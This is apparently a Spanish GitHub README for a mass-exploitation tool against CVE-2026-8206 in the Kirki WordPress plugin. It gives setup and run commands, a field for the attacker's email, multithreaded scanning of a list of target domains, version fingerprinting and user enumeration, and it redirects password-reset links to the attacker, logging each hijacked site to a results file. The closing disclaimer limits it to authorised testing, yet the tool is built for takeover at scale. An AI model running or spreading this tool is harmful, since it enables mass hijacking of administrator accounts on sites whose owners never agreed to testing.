
Herramienta de explotación masiva para CVE-2026-8206 – Escalada de privilegios no autenticada mediante 'handle_forgot_password' en el plugin Kirki de WordPress (≤6.0.6).
Herramienta de explotación masiva para CVE-2026-8206 – una vulnerabilidad crítica en el plugin Kirki de WordPress (versiones ≤ 6.0.6) que permite a atacantes no autenticados secuestrar enlaces de restablecimiento de contraseña y tomar el control de cualquier cuenta de usuario, incluidos los administradores.
El plugin Kirki expone un endpoint REST no autenticado (/wp-json/KirkiComponentLibrary/v1/kirki-forgot-password). Debido a la falta de comprobaciones de permisos y una validación de correo electrónico inadecuada, un atacante puede:
Versiones afectadas: ≤ 6.0.6
Versión corregida: 6.0.7
readme.txt y kirki.min.css (soporta tanto las carpetas kirki como kirki-test)/wp-json/wp/v2/users (alternativa: admin)requestsconcurrent.futures (backport, normalmente ya instalado)Instalar dependencias:
pip install requests futures
git clone https://github.com/Jenderal92/CVE-2026-8206.git
cd CVE-2026-8206
Edite el script para establecer su correo electrónico de atacante:
ATTACKER_EMAIL = "[email protected]" # línea ~15
python CVE-2026-8206.py <archivo_de_objetivos> [hilos]
<archivo_de_objetivos> – archivo de texto con un dominio por línea (con o sin http:///https://)[hilos] – opcional, número de hilos concurrentes (por defecto: 15)python CVE-2026-8206.py objetivos.txt 20
objetivos.txt)example.com
https://vulnerable-site.com
http://127.0.0.1/wordpress
res.txt – contiene los objetivos explotados con éxito en el formato:
URL|usuario|correo_atacante|reset_link_enviado_al_correo_del_atacante
Ejemplo:
https://example.com|admin|[email protected]|reset_link_enviado_al_correo_del_atacante
La salida en consola muestra el progreso en tiempo real:
/wp-content/plugins/{kirki,kirki-test}/readme.txt (Stable tag) y /.../kirki.min.css (parámetro ver). Si la versión ≤ 6.0.6, continúa./wp-json/wp/v2/users, si está vacío utiliza admin como alternativa.username = nombre de usuario objetivoemail = correo del atacanteemailBody = JSON que incluye el chip reset_link200 y "Email sent", el objetivo se escribe en res.txt.Este software se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. El uso no autorizado contra sistemas que no posea o para los que no tenga permiso para probar es ilegal. El autor no se hace responsable por cualquier mal uso o daño causado por esta herramienta.
Puede ver más descargos de responsabilidad en la portada de Jenderal92. Puede consultarlos AQUÍ !!!